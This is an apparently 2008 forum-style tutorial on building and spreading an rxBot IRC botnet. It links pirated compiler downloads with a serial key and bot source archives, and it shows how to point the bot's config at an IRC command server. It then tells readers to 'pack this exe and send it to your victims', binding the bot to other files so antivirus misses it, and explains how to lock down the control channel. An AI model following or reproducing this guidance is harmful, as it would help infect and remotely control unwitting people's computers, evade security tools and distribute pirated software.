Botnet Tutorial
November 21st, 2008In this tutorial im gonna show you how to setup a complete botnet. First of all get an IRCD server (to control the bots). If you want to create one on your own pc, check the tutorial on IRCD. Here’s the tutorial :
1) Microsoft Visual C++ 6.0 Standard Edition
Code:
http://www.megaupload.com/?d=SUHPYZRX
Mirror 2
Code:
http://rapidshare.com/files/21861555/msc__.rar.html
Mirror 3
Code:
http://www.0daymedia.net/files/id/274
Pass: itzforblitz
Serial: 812-2224558
Run the setup.exe and use the serial above.
Configuring the C++ compilier
1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the “Directories” tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
Quote:
C:\PROGRAM FILES\Mcft PLATFORM SDK
C:\PROGRAM FILES\Mcft PLATFORM SDK\BIN
C:\PROGRAM FILES\Mcft PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB
————————————————————————————–
2) Service Pack 6 (Not Windows OS service pack 6)
Code:
http://www.microsoft.com/downloads/details.aspx?familyid=a8494edb-2e89-4676-a16a-5c5477cb9713&displaylang=en
————————————————————————————–
3) Windows Platform SDK
Code:
http://www.megaupload.com/?d=YH3SS78I
Mirror 2
Code:
http://rapidshare.com/files/21854411/sdk.rar.html
Mirror 3
Code:
http://www.0daymedia.net/files/id/266
Pass: itzforblitz
————————————————————————————–
4) The Bot
Download and unpack this source code :
Code:
http://rapidshare.com/files/21854222/botsrc7.6rx.rar.html
Mirror 2
Code:
http://www.0daymedia.net/files/id/265
You should see a folder named Rxbot 7.6
Open it and edit the file Configs.h
Please edit only these lines :
Put in quotations:
char password[] = “Bot_login_pass”; // bot password (Ex: monkey)
char server[] = “aenigma.gotd.org”; // server (Ex: irc.efnet.net)
char serverpass[] = “”; // server password (not usually needed)
char channel[] = “#botz_channel”; // channel that the bot should join
char chanpass[] = “My_channel_pass”; // channel password
Optional:
char server2[] = “”; // backup server
char channel2[] = “”; // backup channel
char chanpass2[] = “”; //Backup channel pass
Once you’re done editing it, save it.
Now open the Microsoft Visual C++ Compiler and go into File
Select Open Workspace and browse to the folder Rxbot 7.6 and open the file rBot.dsw
A library of files should open. Right click on “rBot Files” and click on Build.
This should start the building of your bot. Once it’s done without any errors, go into the folder Debug located in the same folder where you found the Config.h (Rxbot 7.6) and you’ll find your bot (rBot.exe). Now all you have to do is pack this exe and send it to your victims. Whenever someone will run it, the bot will connect itself to the server you provided in Config.h.
Here is the commands list :
http://thug.awardspace.info/commands.html
————————————————————————————-
What does packing a bot mean and how to pack a bot?
To pack a bot means to bind it with some other file so the AV’s (Anti-viruses) don’t detect it and when you’ll send it to people they wont get suspicious and will run the exe thinking its something else. For this you need to have a good binder. Search around the web and you’ll find one for sure.
Securing a bot
Its easy to steal bots so make sure you secure yours. When you’re in the IRC channel where your bot is, right click in the channel main window and select “Channel Modes”. Check the following things :
Only ops set topic
No external messages
Key: *************
and Secret
This way no one besides you or another op can set the channel topic. Remember to make your key same as your channel password.